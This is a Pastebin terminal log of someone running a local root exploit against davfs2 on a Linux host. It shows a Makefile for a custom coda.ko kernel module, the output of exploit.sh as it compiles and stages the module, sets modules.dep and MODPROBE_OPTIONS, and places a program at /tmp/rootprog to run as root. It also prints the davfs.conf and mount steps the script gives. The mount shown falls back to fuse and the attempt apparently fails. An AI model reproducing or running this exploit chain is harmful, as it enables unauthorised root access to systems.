Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- davtest@humble:/tmp$ cat Makefile
- cat Makefile
- obj-m += coda.o
- all:
- make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
- clean:
- make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
- davtest@humble:/tmp$ ./exploit.sh
- ./exploit.sh
- #######################################
- Specify the full path of the kernel module which you want to load
- Leave empty if you wish to compile it now
- Understand that you need kernel headers, make and gcc for successful compilation
- #######################################
- make: Warning: File `Makefile' has modification time 3.4e+04 s in the future
- make -C /lib/modules/3.2.0-4-686-pae/build M=/tmp modules
- make[1]: Entering directory `/usr/src/linux-headers-3.2.0-4-686-pae'
- make[4]: Warning: File `/tmp/Makefile' has modification time 3.4e+04 s in the future
- CC [M] /tmp/coda.o
- make[4]: warning: Clock skew detected. Your build may be incomplete.
- Building modules, stage 2.
- make[4]: Warning: File `/tmp/Makefile' has modification time 3.4e+04 s in the future
- MODPOST 1 modules
- CC /tmp/coda.mod.o
- LD [M] /tmp/coda.ko
- make[4]: warning: Clock skew detected. Your build may be incomplete.
- make[1]: Leaving directory `/usr/src/linux-headers-3.2.0-4-686-pae'
- make: warning: Clock skew detected. Your build may be incomplete.
- #######################################
- Copying the modules in use for the running kernel in the local directory
- #######################################
- #######################################
- Copying coda.ko module
- #######################################
- #######################################
- Setting the 'modules.dep' and running depmod
- #######################################
- #######################################
- Specify the user-mode ELF which you whish to copy in /tmp/rootprog that will be run as root. Default value is /tmp/rootprog
- WARNING !!!!!!!! YOU HAVE ONLY 1 SHOT !!!!! unmounting webdav partitions doesn't unload the coda.ko module
- #######################################
- cp: `/tmp/rootprog' and `/tmp/rootprog' are the same file
- #######################################
- Setting MODPROBE_OPTIONS variable
- #######################################
- #######################################
- Now, check the the /home/davtest/.davfs2/davfs.conf. Modify the default value of 'kernel_fs' to coda eg:
- # General Options
- # ---------------
- # dav_user davfs2 # system wide config file only
- # dav_group davfs2 # system wide config file only
- # ignore_home # system wide config file only
- kernel_fs coda
- # buf_size 16 # KiByte
- #######################################
- #######################################
- Then, check /etc/fstab for remote webdav servers which the user can mount, eg:
- https://www.crushftp.com/demo/ /home/foo/dav davfs noauto,user 0 0
- #######################################
- #######################################
- If the remote webdav is authenticated, ensure to have valid credentials. The run 'mount /home/foo/dav' inside this terminal'
- #######################################
- davtest@humble:/tmp$ mount /home/davtest/dav
- mount /home/davtest/dav
- Please enter the username to authenticate with server
- http://127.0.0.1/webdav/ or hit enter for none.
- Username: test
- test
- Please enter the password to authenticate user test with server
- http://127.0.0.1/webdav/ or hit enter for none.
- Password: test
- /sbin/mount.davfs: no free coda device to mount
- /sbin/mount.davfs: trying fuse kernel file system
- /sbin/mount.davfs: fuse device opened successfully
- davtest@humble:/tmp$ su bart
- su bart
- No passwd entry for user 'bart'
- davtest@humble:/tmp$
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement